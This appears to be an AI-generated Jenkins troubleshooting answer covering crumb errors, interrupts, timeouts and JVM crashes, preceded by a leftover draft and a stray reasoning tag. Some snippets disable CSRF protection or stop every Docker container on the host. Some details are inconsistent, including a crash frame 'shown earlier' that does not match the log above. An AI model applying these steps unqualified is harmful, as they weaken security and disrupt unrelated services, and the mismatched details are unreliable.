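   Generate an API token under the user settings and authenticate requests with `username:api_token`.

### 2. InterruptedException

**Problem**: A Jenkins job throws `java.lang.InterruptedException`, which usually means the job was interrupted[^1].

**Possible causes**:

- The user aborted the job manually
- Insufficient system resources (CPU/memory)
- The job timed out
- The Jenkins node disconnected

**Solutions**:

1. **Check the job log**: look for an explicit timeout or out-of-resources message.
2. **Raise the timeout**:
   Increase the timeout in the Pipeline:
   ```groovy
   timeout(time: 60, unit: 'MINUTES') {
       // job steps
   }
   ```
3. **Tune resource allocation**:
   - Make sure the Jenkins master and agents have enough memory and CPU.
   - Limit the number of parallel jobs (for example with `lock` or `semaphore` in the `Jenkinsfile`).
4. **Check node connectivity**: make sure the agent's network is stable so that it does not disconnect.

### 3. Execution timeout exception (such as `java.net.ConnectException: Connection timed out`)

**Problem**: A network connection times out, commonly during deployment or dependency download[^4].

**Solutions**:

1. **Extend the timeout**:
   ```groovy
   withEnv(['MAVEN_OPTS=-Dmaven.wagon.http.retryHandler.count=3 -Dmaven.wagon.httpconnectionManager.timeout=5000']) {
       sh 'mvn deploy'
   }
   ```
2. **Retry**:
   ```groovy
   retry(3) {
       sh './deploy.sh'
   }
   ```
3. **Check the network environment**:
   - Make sure the target server is reachable (for example the Tomcat deployment address).
   - Check firewall and proxy settings.

### 4. Fatal Java SIGSEGV error

**Problem**: The JVM crashes with a segmentation fault, commonly during packaging jobs in a Docker container.

**Solutions** (supplementing the earlier answer):

1. **Container memory limit**:
   Make sure the container has enough memory (at least 4 GB) and enable container awareness:
   ```groovy
   agent {
       docker {
           image 'maven:3.8.5-openjdk-17'
           args '--memory=4g --cpus=2 -e MAVEN_OPTS="-XX:+UseContainerSupport -XX:MaxRAMPercentage=75.0"'
       }
   }
   ```
2. **Upgrade the JDK**: use OpenJDK 17 LTS (which fixes known memory issues).
3. **Collect the crash log**:
   - Add the JVM option `-XX:+ErrorFileToStderr` inside the container so that the error report is written to the console.
   - Analyze the `hs_err_pid*.log` file to locate the cause of the crash (for example a native library conflict).

---

### General tuning suggestions

1. **Jenkins system configuration**:
   - Upgrade to the latest LTS release (such as 2.426.1).
   - Clean workspaces regularly (with the `ws-cleanup` plugin).
2. **Resource monitoring**: install the `Monitoring` plugin to watch master/agent load in real time.

---

§§Related questions§§

1. How can Jenkins be configured to stay stable under highly concurrent jobs?
2. How can API tokens be managed securely in Jenkins?
3. How can memory leaks in Jenkins jobs be diagnosed?
</think>

The following is a systematic set of solutions for the four core problems seen while running Jenkins (the invalid crumb warning, the InterruptedException, the execution timeout exception, and the Java SIGSEGV error):

---

### 1. Invalid crumb warning (CSRF protection)

**Root cause**: Jenkins's CSRF protection rejects API requests that do not carry a valid crumb[^3]

**Steps**:

1. **Enable the crumb issuer**
   Go to `Manage Jenkins` → `Security` → `Configure Global Security`:
   ```markdown
   [x] Enable proxy compatibility
   [x] Prevent Cross Site Request Forgery exploits
   [x] Default Crumb Issuer   # the key setting
   ```
2. **Add the crumb to API requests**
   ```bash
   # Fetch the crumb as a ready-made "Field:value" header
   CRUMB=$(curl -u "admin:APIToken" -s 'http://jenkins-host/crumbIssuer/api/xml?xpath=concat(//crumbRequestField,":",//crumb)')
   # Send the crumb as a request header, with the same credentials
   curl -u "admin:APIToken" -H "$CRUMB" -X POST http://jenkins-host/job/build
   ```
3. **Temporarily disable it (test environments only)**
   Edit `jenkins.xml` and add the JVM argument:
   ```xml
   <arguments>-Dhudson.security.csrf.GlobalCrumbIssuer.DISABLE_CSRF_PROTECTION=true</arguments>
   ```

---

### 2. InterruptedException

**Root cause**: the job was forcibly interrupted (manual stop, resource contention, or node going offline)[^1]

**Workflow**:

```mermaid
graph LR
A[InterruptedException occurs] --> B{Check the source of the interrupt}
B -->|Stopped manually by a user| C[Add a confirmation step]
B -->|Insufficient resources| D[Tune resource allocation]
B -->|Node offline| E[Monitor node status]
C --> F["Add a confirmation prompt:<br>input message: 'Continue?'"]
D --> G["Limit parallel jobs:<br>lock(resource: 'db'){...}"]
E --> H["Node health check:<br>Jenkins → Manage Nodes → Monitor"]
```

**Concrete actions**:

1. **Handle interruption in the Pipeline**
   ```groovy
   try {
       stage('Build') {
           // Ask for confirmation before a sensitive operation
           input message: 'Run this high-risk operation?', ok: 'Continue'
           sh 'mvn package'
       }
   } catch (InterruptedException ex) {
       // Clean up resources gracefully (note: this stops every container on the host)
       sh 'docker stop $(docker ps -aq)'
       error "Build was interrupted: ${ex.message}"
   }
   ```
2. **Resource isolation**
   ```groovy
   lock(resource: 'high_mem_job', inversePrecedence: true) {
       sh './memory_intensive_task.sh' // runs with exclusive access to the resource
   }
   ```

---

### 3. Execution timeout exception

**Typical error**: `java.net.ConnectException: Connection timed out`[^4]

**Solutions by problem type**:

| Problem type | Diagnostic command | Fix |
|---------------------|-----------------------------|------------------------------------------------------------------------------------------|
| **Network timeout** | `ping target-host` | Add a timeout parameter to the Jenkins global configuration: `-DsocketTimeout=600000` |
| **Deployment failure** | `telnet deploy-host 8080` | Add a deployment retry: `retry(3) { sh 'cargo redeploy' }` |
| **Dependency download** | `mvn dependency:resolve -X` | Configure a mirror repository: `<mirror><id>aliyun</id><url>https://maven.aliyun.com</url></mirror>` |

**Key configuration**:

```groovy
// Jenkinsfile with pipeline-wide and per-stage timeouts
pipeline {
    agent any // a declarative pipeline requires an agent section
    options {
        timeout(time: 2, unit: 'HOURS') // pipeline-level timeout
    }
    stages {
        stage('Deploy') {
            options {
                timeout(time: 30, unit: 'MINUTES') // stage-level timeout
            }
            steps {
                retry(3) { // retry on failure
                    sh 'cargo redeploy --timeout=600000'
                }
            }
        }
    }
}
```

---

### 4. Java SIGSEGV error

**Root cause**: out-of-bounds memory access in the JVM or a native library conflict (common in container environments)

**Remedies**:

#### 1. **Container memory tuning**

```groovy
agent {
    docker {
        image 'maven:3.8.6-eclipse-temurin-17'
        args '''
            --memory=4g
            --cpus=2.0
            -e MAVEN_OPTS="-XX:+UseContainerSupport -XX:MaxRAMPercentage=75.0"
        '''
    }
}
```

#### 2. **JVM option tuning**

```bash
# Set before running mvn
export MAVEN_OPTS="-XX:+CrashOnOutOfMemoryError -XX:ErrorFile=/tmp/hs_err_%p.log"
mvn clean package
```

#### 3. **Crash log analysis**

```bash
# Show the key fields of the crash log
grep -A 20 "SIGSEGV" /tmp/hs_err_*.log

# Typical output to look for:
# ----------------
# Problematic frame:
# C [libnative.so+0x1234]   # points to a native library conflict
```

**Handling strategy**:

1. If the frame is in `[libjvm.so+...]` → upgrade the JDK to Temurin 17.0.8+
2. If the frame is in `[libc.so.6+...]` → standardize on one base image (`eclipse-temurin:17-jdk-alpine` is recommended)

---

### 5. System-level hardening recommendations

1. **Jenkins global configuration**
   ```bash
   # Increase the JVM heap size (jenkins.xml)
   <arguments>-Xmx4g -XX:MaxRAMPercentage=75.0</arguments>
   ```
2. **Regular maintenance job**
   ```groovy
   // Daily cleanup job
   pipeline {
       agent any
       triggers { cron('@daily') }
       options { buildDiscarder(logRotator(numToKeepStr: '10')) }
       stages { stage('Cleanup') { steps { cleanWs() } } } // cleanWs() comes from the ws-cleanup plugin
   }
   ```

---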
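The crash-log triage described above (look at which library the problematic frame points to, then pick the fix) can be sketched as a small shell helper. This is a minimal illustration rather than part of the original answer: the function names `problematic_frame` and `classify_frame` are hypothetical, and it assumes the report has the usual `# Problematic frame:` line followed by the frame on the next line, as in the console output shown earlier.

```bash
#!/usr/bin/env bash
# Sketch: extract the "Problematic frame" entry from an hs_err report
# (or from console output containing the same banner) and classify it.

# Print the line that follows "# Problematic frame:" in the given file,
# with the leading "# " stripped.
problematic_frame() {
  awk '/^# Problematic frame:/ { getline; sub(/^# */, ""); print; exit }' "$1"
}

# Map a frame line to a coarse category based on the library in brackets.
classify_frame() {
  case "$1" in
    *"[libjvm.so+"*) echo "jvm" ;;     # crash inside the JVM itself
    *"[libc.so"*)    echo "libc" ;;    # crash inside the C library
    *"["*".so"*)     echo "native" ;;  # some other native library
    *)               echo "unknown" ;; # no recognizable library name
  esac
}
```

A typical call would be `classify_frame "$(problematic_frame /tmp/hs_err_pid7.log)"`. For the frame in the log above (`V [libjvm.so+0x83dc9f] ...`) it prints `jvm`, which corresponds to the first branch of the handling strategy.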